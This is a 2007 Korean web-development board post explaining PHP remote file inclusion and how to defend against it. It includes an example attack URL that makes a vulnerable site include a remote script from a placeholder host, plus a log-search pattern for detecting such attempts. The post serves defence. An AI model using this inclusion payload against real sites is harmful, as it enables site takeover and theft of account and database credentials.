메인
기술
메인
기술
무료게임
잡담
자유
개인
일정
갤러리
회원가입
계정 찾기
로그인
HOME
기술
홈페이지 해킹을 줄여보자.
목록
작성자
공대여자
작성 : 2007-06-19 10:52
조회 : 111
지남
1일간
2007-06-19
-
2007-06-19
좌표
첨부된 파일이 없습니다.
#weblang
해킹방법
본래 URL : http://xxxx.com/index.php?inc=menu/step2.php
해킹시도 URL : http://xxxx.com/index.php?inc=
http://yyyy.com/hack.txt
설명
GET 인자로 inc가 include하는 페이지를 나타내는 경우
본래 페이지 대신에 http://yyyy.com/hack.txt 가 include되어서 동작한다.
피해
hack.txt가 악의적으로 만들어진 스크립트를 포함할 경우 그 스크립트가 웹상에서 실행되어 핵커는 홈페이지를 마음대로 제어하게 된다.
핵커는 홈페이지에 사용된 변수 속에서 계정 아이디,비밀번호 또는 DB 아이디, 비밀번호를 알아낼 수 있을 것이다.
대책
위 방법은
PHP 4.3.x 이상
으로 PHP를 업그레이드 하면 대부분 막을 수 있다.
GET 인자로
include하는 페이지의 url을 받아오지 않는다.
꼭 받아야할 경우 지정된 폴더를 뺀 url을 받고 PHP안에서 그 url을 포함시켜서 처리한다.
ex>
?inc=step2.php
PHP안에서는
$inc = 'menu2/'.$_GET['inc'];
처럼 처리
카운터에서
의심스런 접근
이 없는지 확인한다.
카운터의 DB에서 접근 페이지를 %?%http://% 처럼 검색해보기 바란다.
P.S
카운터 뒤지던 중 하도 저런 접근이 많아서(약 80 회) 한번 적어봅니다.
언제나 "공대여자는 이쁘다"는 마음가짐을 가지세요.
댓글
/
/
답변
수정
삭제
No Nickname
No Comment
새로운 댓글 작성
권한이 없습니다.
{{m_row.m_nick}}
내용이 너무 많습니다!
-
no-star
★☆☆☆☆
★★☆☆☆
★★★☆☆
★★★★☆
★★★★★
확인
목록형
📅 달력형
게시물 : 1641 (110 page)
No
제목
작성자
등록
조회
공지
[기본형] HTML (with 부트스트랩5.3 , jquery 3.7, vue.js)
공대여자
02/06 13:44
5099
공지
유용한 리눅스(LINUX) 명령어
공대여자
03/03 14:47
14650
공지
[공지] 기술 게시판
mins01
06/24 15:10
14835
swiper 에서 부모가 보이고 안보이고 할 때 슬라이드가 이상해지는 것 현상 방지 옵션.
new
#swiper
ui_treemap
2
#treemap
:scope selector , querySelector 에서 this, self node 지정
1
#css
#this
#self
#scope
game_tictactoe
2
#game
bootstrap extensions 부트스트랩 확장
2
#bootstrap
#css
윈도우 화면 새로 고침 하기, 그래픽 드라이버 재시작
2
#윈도우
#window
contenteditable 에서 포커스가 안생길 때 강제로 포커스 주는 코드
#range
#selection
#contenteditable
ui_layerForElement 요소 기준으로 레이어 위치 잡기
2
#layer
typingLetters 한글자씩 나타내기
1
#html
#effect
scrollbars styling
1
#css
#scrollbars
#styling
[기본형] chartjs 기본 설정 코드
#chartjs
ui_elbowConnector 연결선
2
#connector
js_colorschemes
3
#js
#color
색상에 대한 설명,파레트,네이밍
1
#color
css로 만든 태양계 공전 자전 표시
1
#css
tag
제목
내용
제목+내용
제목+내용+코멘트
작성자
태그
검색